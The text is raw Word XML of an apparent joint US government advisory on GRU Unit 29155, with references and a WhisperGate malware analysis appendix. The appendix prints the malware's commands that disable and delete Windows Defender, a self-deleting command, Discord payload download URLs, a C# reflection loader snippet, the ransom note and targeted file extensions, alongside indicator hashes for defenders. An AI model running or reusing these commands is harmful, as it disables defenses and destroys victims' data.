        <w:t>Identify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the implications of post- quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Socket Layer (SSL)/Transport Layer Security (TLS) to protect data in transit. Security Controls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addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 3 to Table 14). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Resources MITRE: WhisperGate CISA AA22-057A: Destructive Malware Targeting Organizations in Ukraine DOJ Press Release: Russian National Charged for Conspiring with Russian Military Intelligence to Destroy Ukrainian Government Computer Systems and Data FBI: Cyber Crime CISA: Russia Cyber Threat Overview and Advisories MITRE: Group G1003 - Ember Bear MITRE: Impacket NIST NVD: CVE-2020-1472 NIST NVD: CVE-2021-26084 NIST NVD: CVE-2021-3156 NIST NVD: CVE-2021-4034 NIST NVD: CVE-2022-27666 NIST NVD: CVE-2021-33044 NIST NVD: CVE-2021-33045 NIST NVD: CVE-2022-26134 NIST NVD: CVE-2022-26138 NIST NVD: CVE-2022-3236 MITRE: BloodHound MITRE: Rclone MITRE: P.A.S. Webshell CISA: Known Exploited Vulnerabilities Catalog CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems CISA, NIST: Defending Against Supply Chain Attacks CISA, NSA: IAM Recommended Best Practices Guide for Administrators References Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor CrowdStrike: EMBER BEAR Threat Actor Profile Mandiant Threat Intelligence: Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software Introduction to Acunetix GitHub: OWASP Amass Kali Linux Tutorials: Droopescan GitHub: OWASP JoomScan Kali.org: MASSCAN DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections Shodan: What is Shodan?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>VirusTotal: How it Works GitHub: Through the Wire Confluence Security Advisory: Confluence Server and Data Center - CVE-2022- 26134 Microsoft: Security Bulletin MS17-010 Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant? Palo Alto Networks Unit 42: Threat Brief - Ongoing Russia and Ukraine Cyber Activity CERT-UA#3799 Report Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict Contact Information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 report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA's 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Disclaimer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information in this report is being provided "as is" for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies. Version History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September 5, 2024: Initial version. Appendix A: WhisperGate Malware Analysis Overview</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technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.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Unit 29155 cyber actors' use of WhisperGate involved the deployment of the malware files, stage1.exe and stage2.exe. WhisperGate has two stages that corrupts a system's master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg-the malicious payload that is in-memory loaded and performs the destructive capabilities.[18] Categorization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Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster. Cluster 1</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Cluster 1 contained the following files: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource, e.g., payload, for stage2.exe)[18] saint.exe (a downloader, SaintBot, as detailed by CERT-UA)[19] puttyjejfrwu.exe[19] Cluster 2</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Cluster 2 contained: hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip (means for sending malware in over 35 different zip files via Discord links)[20] Several Microsoft Word documents with macros that download test01.exe from 3237.site. Once executed, test01.exe downloads load2022.exe from smm2021.net. Cluster 3</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Cluster 3 contained: hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>29155 cyber actors' use of Client.exe was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.) asd.exe (likely a development version of stage1.exe) Behavioral Analysis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Two Windows Portable Executable (PE) files (stage1.exe and stage2.exe) were obtained from the Ukrainian victim for analysis. One PE file (asd.exe) was obtained from a U.S. victim. stage1.exe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stage1.exe was obtained from the C:\ path of the Ukrainian victim's Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe.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15: stage1.exe Properties MD5 5d5c99a08a7d927346ca2dafa7973fc1 SHA-256 a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 Compiler MinGW(GCC: (GNU) 6.3.0)[-] Linker GNU linker Id (GNU Binutils)(2.28)[GUI32] TimeDateStamp 2022-01-10 05:37:18 Execution Message Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions.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16: asd.exe Properties MD5 eac0ae655d344c25ff467a929790885c SHA-256 b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b Compiler MinGW(GCC: (GNU) 6.3.0)[-] Linker GNU linker Id (GNU Binutils)(2.28)[Console32,console] TimeDateStamp 1969-12-31 19:00:00</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asd.exe is likely a development version of stage1.exe. While the behavior of asd.exe is similar to stage1.exe, the messages displayed were different. stage2.exe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stage2.exe was obtained from the C:\ path of the Ukrainian victim's Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe.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17: stage2.exe Properties MD5 764f691b2168e8b3b6f9fb6582e2f819 SHA-256 aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a Library .NET(v4.0.30319)[-] Linker Microsoft Linker(6.0)(GUI32,signed) TimeDateStamp 2022-01-10 09:39:54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18 lists the following chronological observations when stage2.exe executes.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18: stage2.exe Behavioral Analysis Observations Event Victim Observation PowerShell command executed twice C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== Base64 UTF-16LE string decoded Start-Sleep -s 10 HTTP GET request sent to Discord URL to download Tbopbh.jpg</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hxxp://cdn.discordapp.com/attachments/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928503440139771947/930108637681184768/Tbopbh[.]jpg Nmddfrqqrbyjeygggda.vbs created and executed within the %TEMP% directory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Visual Basic Script (VBS) file contained the following command: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CreateObject("WScript.Shell").Run "powershell Set-MpPreference - ExclusionPath 'C:\'", 0, False AdvancedRun.exe created and executed twice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C:\Users\&lt;user&gt;\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run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C:\Users\&lt;user&gt;\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run InstallUtil.exe created and executed; files corrupted following execution C:\Users\&lt;user&gt;\AppData\Local\Temp\InstallUtil.exe Static Analysis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Static analysis was further conducted on two files (stage2.exe, Tbopbh.jpg) to uncover additional malware functionality and attributes. stage2.exe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Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in Table 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.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19: stage2.exe Variant Properties MD5 14c8482f302b5e81e3fa1b18a509289d SHA-256 dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 Library .NET(v4.0.30319)[-] Linker Microsoft Linker(6.0)(GUI32,signed) TimeDateStamp 2022-01-10 09:39:54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variant of stage2.exe contained multiple layers of execution: stage2.exe contained a WebClient object that was initialized with Discord URL hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the payload Tbopbh.jpg.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>stage2.exe contained logic to reverse file bytes of a file using the Array's Reverse method.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>stage2.exe contained logic to load an Assembly object into a Stream object. stage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">stage2.exe contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption class which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to decrypt. Additionally, the XOR functionality occurred using the initialized byte "Array" shown below. The encryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained EazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to analyze: byte[] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220}; stage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string: UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== When the above string was base64 decoded, the system displayed the following PowerShell command: Start-Sleep -s 10 stage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg. Tbopbh.jpg (payload for stage2.exe variant)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 account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg: MD5: b3370eb3c5ef6c536195b3bea0120929 SHA-256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6</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When viewing payload Tbopbh.jpg using a hex editor, it ended with value "ZM" or hex values "5A 4D"-this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in Table 20 below.</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20: Tbopbh.jpg Properties MD5 e61518ae9454a563b8f842286bbdb87b SHA-256 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d Protector Eazfuscator(-)[-] Library .NET(v4.0.30319)[-] Linker Microsoft Linker(6.0)[DLL32] TimeDateStamp 2022-01-10 09:39:31</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original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21:</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21: Frkmlkdkdubkznbkmcf.dll Attributes Resources Classes Methods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\u2005 \u2005 \u2009 \u2008 \u2001 \u2007 \u2009 \u200b \u200a \u2005</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Note: This format annotates action taken by EazFuscator to obfuscate items, making it difficult for malware analysts to review. Main - ClassLibrary1 \u0002 7c8cb5598e724d34384cce7402b11f0e pc1eOx2WJVV1579235895 - Ylfwdwgmpilzyaph 78c855a088924e92a7f60d661c3d1845</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stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block:</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using System.Reflection; string path = "Frkmlkdkdubkznbkmcf.dll"; string fqpn = Path.GetFullPath(path); Assembly assembly = Assembly.LoadFile(fqpn); Type type = assembly.GetType("ClassLibrary1.Main"); type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);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following application configuration accompanied the above code block to allow loading from remote sources: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&lt;?xml version="1.0" encoding="utf-8" ?&gt; &lt;configuration&gt; &lt;runtime&gt; &lt;loadFromRemoteSources enabled="true"/&gt; &lt;/runtime&gt; &lt;/configuration&gt;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Upon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs wrote to the Windows %TEMP% directory and has the following attributes, as listed in Table 22 below.</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22: Nmddfrqqrbyjeygggda.vbs Attributes MD5 6eed4ee0cc57126e9a096ab9905f471c SHA-256 db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f VBS Code CreateObject("WScript.Shell").Run "powershell Set-MpPreference - ExclusionPath 'C:\'", 0, False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VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C:\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll (78c855a088924e92a7f60d661c3d1845). Further analysis of Frkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes: MD5: 5a537673c34933fc854fbfb65477a686 SHA-256: 35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a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decrypted DLL file contained two resources, AdvancedRun and Waqybg. AdvancedRun (GZIP) MD5: de85ca91e1e8100a619de1c25112f1a5 SHA-256: 489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166 Waqybg (GZIP) Reversed byte order: MD5: 9b1191f1ceddf312b0d609cd929c6631 SHA-256: 0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3 Original byte order: MD5: 29d83f29c0b0a0b7499e71e7d5cb713f SHA-256: fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2</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23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.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23: AdvancedRun (decompressed) Type Win32 EXE Company NirSoft TimeStamp 2020:08:03 09:41:38-04:00 Original File Name AdvancedRun.exe MD5 17fc12902f4769af3a9271eb4e2dacce SHA-256 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b</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24: Waqybg (reversed; decompressed) Type Win32 EXE TimeStamp 2022:01:10 03:14:38-05:00 MD5 3907c7fbd4148395284d8e6e3c1dba5d SHA-256 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 Compiler MinGW(GCC: (GNU) 6.3.0)[-] Linker GNU linker Id (GNU Binutils)(2.28)[Console32,console]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reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily and delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 &gt; Nul &amp; Del /f /q "%s". Waqybg is known as WhisperKill-a malware downloaded by WhisperGate that destroys files with specific extensions.[19],[21]</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The following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the "wcscmp" C function logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0xcc values per targeted file. Table 25: File Extensions Targeted by WhisperKill u".3DM" u".3DS" u".602" u".ACCDB" u".ARC" u".ASC" u".ASM" u".ASP" u".ASPX" u".BACKUP" u".BAK" u".BAT" u".BMP" u".BRD" u".BZ2" u".CGM" u".CLASS" u".CMD" u".CONFIG" u".CPP" u".CRT" u".CSR" u".CSV" u".DBF" u".DCH" u".DER" u".DIF" u".DIP" u".DJVU.SH" u".DOC" u".DOCB" u".DOCM" u".DOCM" u".DOCX" u".DOT" u".DOTM" u".DOTX" u".DWG" u".EDB" u".EML" u".FRM" u".GIF" u".HDD" u".HTM" u".HWP" u".IBD" u".INC" u".INI" u".ISO" u".JAR" u".JAVA" u".JPEG" u".JPG" u".JSP" u".KDBX" u".KEY" u".LAY" u".LAY6" u".LDF" u".LOG" u".MAX" u".MDB" u".MDF" u".MML" u".MSG" u".MYD" u".MYI" u".NEF" u".NVRAM" u".ODB" u".ODG" u".ODP" u".ODS" u".ODT" u".OGG" u".ONETOC2" u".OST" u".OTG" u".OTP" u".OTS" u".OTT" u".P12" u".PAQ" u".PAS" u".PDF" u".PEM" u".PFX" u".PHP" u".PHP3" u".PHP4" u".PHP5" u".PHP6" u".PHP7" u".PHPS" u".PHTML" u".PNG" u".POT" u".POTM" u".POTX" u".PPAM" u".PPK" u".PPS" u".PPSM" u".PPSX" u".PPT" u".PPTM" u".PPTM" u".PPTX" u".PS1" u".PSD" u".PST" u".RAR" u".RAW" u".RTF" u".SAV" u".SCH" u".SHTML" u".SLDM" u".SLDX" u".SLK" u".SLN" u".SNT" u".SQ3" u".SQL" u".SQLITE3" u".SQLITEDB" u".STC" u".STD" u".STI" u".STW" u".SUO" u".SVG" u".SXC" u".SXD" u".SXI" u".SXM" u".SXW" u".TAR" u".TBK" u".TGZ" u".TIF" u".TIFF" u".TXT" u".UOP" u".UOT" u".VBS" u".VCD" u".VDI" u".VHD" u".VMDK" u".VMEM" u".VMSD" u".VMSN" u".VMSS" u".VMTM" u".VMTX" u".VMX" u".VMXF" u".VSD" u".VSDX" u".VSWP" u".WAR" u".WB2" u".WK1" u".WKS" u".XHTML" u".XLC" u".XLM" u".XLS" u".XLSB" u".XLSM" u".XLSM" u".XLSX" u".XLT" u".XLTM" u".XLTX" u".XLW" u".YML" u".ZIP" Malware Related to Tbopbh.jpg</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stage2.exe and its respective payload, Tbopbh.jpg, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below.</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 stage2.exe Execution Process Template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26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll.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Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format, e.g., "Functional" format. The hashes in Table 26 represent both byte orders.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Table 26: Files Located in Discord Cluster 1 Filename MD5 (Reversed) MD5 (Functional) Afgyyppsysmtddhvhhaw.dll d034fe4c71b16b6d331886c24fef2751 4074798a621232dc448b65db7b1fdd66 Avbbwys.dll 422437f326b8dbe30cc5f103bde31f26 7f84263fd24f783ff72d5ae91011b558 Azkebvoyswvjnrpmn.dll 562c337b8caca330da2ea6ae07ee5db6 f73d203bdf924658fd6edf3444c93a50 Budoejokuqbge.dll 58e879213d81333b628434ba4aeb2751 08dfebc04eb61c9a6d87b6524c1c0f2e Bwqdffttejlkeqe.dll 1c85c0d044ac837e8939564afac1eb32 8633bd2bbbb5da22c3f8751150186c42 Bxqbsyxfkjzmhdtfceoak.dll 7234da8ceafbe6586469f18c03cc1832 5f4df6dd8e644d59eaf182e500b5e7bf Clsrncpbaucrabuobcpale.dll 618d62dd95fd9aeb855fe2ef1403dce5 955e4c198ee58e40fe92cb74ceefdf00 Cpdvzvzyghy.dll d40195a444526eafb0db56d95bf8655d a905d620717f75751aa94ceb88995dbc Ctiktdfyauejxfak.dll d06761b2cff86035a4838110ed6ab622 2ca6bcf16ee4293a771a1cf7b7b9ee49 Czxhayyankwsp.dll 59da31da4db1aa5f9a5c7c0c151422c8 de1bf141976776becd376a0dac400df6 Djpajq.dll de1f9d1f0336ddcff832ad3900acd2f1 974e7c0b3660fbf18f29eac059f85ac0 Dmdtflkcgebf.dll 394e056cb6cb732dfd5e0d45d3dae938 4d8343c40be53d6521244fe74393d937 Ejcpaujkmvjndgqznimmkgd.dll b7c1a8d39f46eaf52be90e24565dd6b0 7a70d5fbbafe3454b76e3ad2f009618f Encuutwvdqbxlxh.dll 2b39eab325906b0a3ab7e584c3d67349 df4f856f783d23fb01af1e0e64bc0e20 Esalfjyraquwfxcgufwzip.dll 80f0ee332a452172533ad8863bb3bc63 f4f4e55a00d2f3a433c9e5624285ac1c Fdgofjdvmmllgsxunb.dll 9345425cf07b4c39a80cd8540e08bfde eef2363744345741e09fe5380eeb4df3 Fkhzvcuucaprsibp.dll aecb57e20d2c0b0d9fece2cbcbcc3459 4bce4831b1dd71f19c55b3e3b5e99856 Fkthhyexkr.dll 58dc7c9577ff90a046359ca255c0c9f4 19cb20c4e7dbfe15c1aa284752d0fecb Fqattuyxknkhv.dll 5c9e2195d10375b746b6717fdb47b5b9 2b5f159f022109a8de1bc5dd9e3138a0 Fqyubbzbubsge.dll afbb9459d4a0f60d7ffb3b3532d11bc2 8d3d4d702ba6b4be2766a41bfe5ff76e Frkmlkdkdubkznbkmcf.dll b3370eb3c5ef6c536195b3bea0120929 e61518ae9454a563b8f842286bbdb87b Gsiook.dll a1b509254a0a1daa7e00d279ec974461 0e03103e8110785156105946e48ea9e0 Gutjuhi.dll 791a81f31a8e7090a7d5417451e09efa fba76f4eb2e7a2eb17193bebe290a198 Hisvswmeswmnqbvzpoxzx.dll e1a15bc13157134f542cd9c55c742460 c9d1677f4f89b95b41591b23a1dc1a63 Hsoahb.dll cd62d4a178705b2b90a8babd8613df93 032f5642d4fb2fdd74e6f20a13c57746 Icyjkszdzgoxdfuwptkwxo.dll f34f60375bebad861a35b7c4bb0fa1c8 a66b3b22a3619f739b197d0d443b700c Jdfzavlqr.dll 7fe7f33d9b5dbdf3d032d2a10e39f283 8cfef66b390f08bdbfd940922cf51650 Jrdggfjvve.dll b32e14a9b7de6c92cd16758fa6e23346 1220b580cef1bf22351e271773945d20 Jteieurqgvpgnhw.dll b85538f665fdb6c8d9a74f2df7369832 ffa68749aa3fc6495e2c49b01d964339 Kbuqtmznmodjzvxvwxcvho.dll 869742fb9db71fdb66f00528fe2966ec 5b884f15dc9b072d7bbad9ec2b249f38 Kdmvyizz.dll 2128361d8aaae1225d50c9add32006a1 9152c9de57b5647ee4ab3dff551dc8dd Kfxghcmg.dll 56e0446a6d7175a0d09110bc483ddbed fc418fdda06ce5982153766dcefb71d9 Krewcizfplntbwcqawfhtfpd.dll 6a4fca88ee36fecc5113e188cc39d25c 5c3b0040e2dece6e17093ae607b79044 Lsurhpmpyewhv.dll 143594597130e301499e5940a5fb798a 911c7e82f32f78577dcd725a7adb114d Mbkzrkfasxgxtzhgpgsehip.dll 993f01861aff306df44e6475f7886f37 e4634ef9bfe7b598b857ad997445b239 Mhnovdgzzidqx.dll 64b9feeccf6c183b9f7138f8fc53acbb 7e0c42d33921a89724424f17c97037bd Mlfampnfnmjvjnahkrawwqd.dll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ddec2d79f460a881849037336ba8968f d973210977957209f255b58eb1715b12 Mppveiyannobrcdlkd.dll 9606b4720a0e73ef1f00505a11aab2f7 0adc2530cf348c0a3d53a680291a3d67 Mzhyeemgqbmamubqn.dll f772f5c65d65412f61ef5f2660e33ceb f8ffd1eab6223e31b15d0fd6c3c0472e Nbbudwt.dll 875f9200b49db08c33962b0a6bd05ab9 2e035360971a817b854d7d5a2b008717 Nhqcfzagulwaw.dll fa97dbe84ce7717b754795fa89f13dce 601c12596dfea84c2113ae5ee59a52ec Nlzhpvuzzoycqnnpl.dll d8c04ecd646a1f8537a59f63518ef3c6 47f4534da421daf8089cf34d53f6bb6e Noubvdigjlwsnqiylzgikkk.dll 3bcff990faacbebb8fb470dfe03e2543 683546b9171a1ea284a96d1b45d1d823 Nvxwbzciqarteyuz.dll c265188fdadddb648629e8060601dca7 af85885a74cfe099676af542dcdc5741 Nykfvwmchighqwcguabvgq.dll 8a2ba7f9cb6f65edf65dbe579907551e 673586594242d99ab02118595e457297 Ofgdwttnmqibnmpqx.dll 9657c2ef6ed5229740b125df9ca6c915 0dc5ac12f7690db15c99eaabc11b129c Ohtvepefcjnchrrasokn.dll a5494ffd9efb7c3df59c527076a05e62 e2cc52273d56ed66c800a726760c1ed0 Olkscszculdbzvco.dll 85afdef18d65b0518d709a5a324ea57a 77675a24040f10c85112d9a219d5f1c7 Onkwzkpfuqazvali.dll da4d81f9ef3b25ea09f34481d923dd9d cc4a9db6f250114e26d8d9ba6ab46bc9 Opaqwrazeyyilbbjlkf.dll 0e6374042b33d78329149a6189a7cb46 1934e2ebc64d41e37ef53ea0c075e974 Owxtabfdqhkaahhwsgkatuu.dll d33f608f561096be24cba91797e0da2f 332b7f6662e28e3577bd1b269904b940 Poezcjhvkzgmnyqljpbte.dll 32db8abce1618e60441f5c7cf4be0d22 2b2509c6ee46d6327f2f1c9a75122d15 Rvyqctymumtudroyae.dll dd2431b1f858b4ca14a4ea05fb8c4a06 9b2924c727aa3a061906321a66c9050c Sutragevr.dll 7d3b529db1bd896d9fd877b85cafdc64 de276cf07ccffa18d7ffc35281bca910 Sxkdxclqmxnmjgedhgagl.dll 6e1394938c2fecad2d4f5b3bcf357ec0 d6b41747cb035c4c2b08790cd57f0626 Tosyxesxgrzyb.dll 99305ce01cc2d0f58cd226efb2de893f 6859fe5a3eead00a563cd93efcc6ea96 Tpmnkauftdydomyz.dll 6c152774f6894407075e6f0a2859bbae 981160dee6cd25fb181e54eca7ff7c22 Tptjtwfhpsjfksqoajt.dll 343b140977b3f9b227e7e5f82b0fadb5 95cf2a5a24b0d33d621bb8995d5826bc Tsgblplhdwwj.dll 54a9fa9eb337a3b5ca7b0fa4553e439d cee5acbfef7e76f52f40b8ae95199c50 Uqhznlcagzyoqrbyylnnwn.dll 4c19aeecbfca13b8a199703d8b8284b9 ad0ca738aa6c987e4ee1a87ff2b8acd5 Uslrfkxccdyetfdxmaokbhv.dll dc795cb9290b1bc0b7fb1ce9d6ae7c93 552d9b79cc544fc6c3e8aa204dd00811 Waordspinycera.dll 9935a86108e3ae3f72cd15817601dcc6 5d063eecd894d3d523875bc82ef6f319 Wcfsobntsczz.dll 77aa3f342a0d69fda67c853bcc004d48 d0b00a6c83ce810ec2763af17e8ab1c4 Wpqyhvfnunlabx.dll 03af632aa6f87bf9dd4364ee3b612cbb 9f11e915be5c0d02a3130329cf032a28 Wqwpawlulyrsrjcbvuvddeud.dll 41871fef433d7b4b89fd226fe3a1a2c0 e21fe98cc8866c0eeecf3549ebcec751 